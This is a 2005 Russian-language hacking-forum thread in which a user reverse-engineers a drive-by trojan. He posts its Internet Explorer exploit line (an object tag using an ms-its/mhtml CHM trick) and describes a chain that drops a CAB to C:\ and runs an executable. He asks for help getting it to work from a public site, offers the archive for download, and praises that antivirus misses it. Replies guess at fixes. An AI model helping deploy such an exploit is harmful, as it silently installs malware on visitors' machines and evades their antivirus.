ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Безопасность > Windows
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Запуск exe прямо с сайта
  #1  
Старый 11.12.2005, 00:18
Аватар для vvs777
vvs777
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503

Репутация: 454


Отправить сообщение для vvs777 с помощью ICQ Отправить сообщение для vvs777 с помощью AIM
Exclamation Запуск exe прямо с сайта

Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data=  "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.

Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.

Последний раз редактировалось vvs777; 11.12.2005 в 00:24.. Причина: Забыл файл.
 
Ответить с цитированием

  #2  
Старый 23.12.2005, 01:16
Аватар для vvs777
vvs777
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503

Репутация: 454


Отправить сообщение для vvs777 с помощью ICQ Отправить сообщение для vvs777 с помощью AIM
По умолчанию

Глухо. Может, не в тот раздел кинул?
 
Ответить с цитированием

кажется из-за!
  #3  
Старый 23.12.2005, 08:18
Аватар для Dread
Dread
Познающий
Регистрация: 04.12.2005
Сообщений: 31
Провел на форуме:
226204

Репутация: 5
Отправить сообщение для Dread с помощью ICQ
По умолчанию кажется из-за!

Цитата:
Сообщение от vvs777  
Когда-то подцепил вирус Mediket. Что он делает так и не понял, но появляется в виде каба в корне диска C. EXEшник из каба запускается.
Потом еще пару раз цеплял другие его моды. Надоело мне все это, захотел разобраться как он ко мне попадает. Вот что нашел. На каком-то сайте лежит
(как его обозвал Касперский) Trojan-downloader.JS.small.bp. Это просто яваскрипт, который в конечном итоге пишет строчку типа
Код:
<object data=  "ms-its:mhtml:file://C:cust20cust.mht!http://localhost/bomba.chm::/bomba.htm" type="text/x-scriptlet"></object>
bomba.chm определяется как Trojan-downloader.JS.Psyme.bi
в нем единственный файл bomba.htm, в котором находжится очень извращенный яваскрипт, одна часть которого грузит cab-архив в c:\, потом запускает через object, а другая получает имена всех подпапок из Temporary Internet files и пробует запустить другой архив из каждой.
В архиве лежит exe-шник и инф-файл, запускающий его.
Кстати, все названия файлов выглядели типа eied_s7.chm итп, я их заменил. Сайт заменил на локалхост.
====
Так вот. Поставил себе самописный сервак на делфи, открываю страницу http://localhost/launch.htm в IE. Все в порядке, через пару секунд запускается программа на делфи (окно и кнопка, по которой зацикливание).
Значит, код работает. Аналогично когда localhost заменен на ip соседнего компа сети.
Когда я поменял везде localhost на мой тест-сайт develop.hut1.ru, пытаюсь запустить все это из интернета, нифига не запускается. Кажется, дело не доходит до chm-файла.
Может, кто-то увидит, из-за чего?
Код все таки интересный. Заходишь на сайт и тебе сразу троян. И каспер уже не палит.

Архив с этой байдой КАЧАТЬ ТУТ
PS: Использовался cabarc.exe, блокнот, IE, htm2chm, Delphi и может что забыл.
кажется из-за "file://" если его убрать на localhost'e то exe и тут не запустится!!!
 
Ответить с цитированием

  #4  
Старый 23.12.2005, 17:16
Аватар для nerezus
nerezus
Pagan Heart
Регистрация: 12.08.2004
Сообщений: 3,791
Провел на форуме:
6490435

Репутация: 2290


Отправить сообщение для nerezus с помощью ICQ
По умолчанию

теоретически никак
 
Ответить с цитированием

  #5  
Старый 25.12.2005, 00:54
Аватар для vvs777
vvs777
Познавший АНТИЧАТ
Регистрация: 16.11.2004
Сообщений: 1,257
Провел на форуме:
1331503

Репутация: 454


Отправить сообщение для vvs777 с помощью ICQ Отправить сообщение для vvs777 с помощью AIM
По умолчанию

Не, я гарантирую что это должно работать. С того американского сервака этот вирусяка мне же приплыл когда-то? И file там вроде не должен быть...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Движок сайта МГПИ - спёкся! n4r0$ Болталка 6 27.03.2009 11:43
ваше мнение о дизайне сайта inxaoc Уязвимости 12 29.11.2005 19:34
Безопастость сайта определит браузер PSalm69 Мировые новости 2 28.11.2005 08:44
Смешное название сайта XgLuiR Болталка 2 12.11.2005 16:07



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ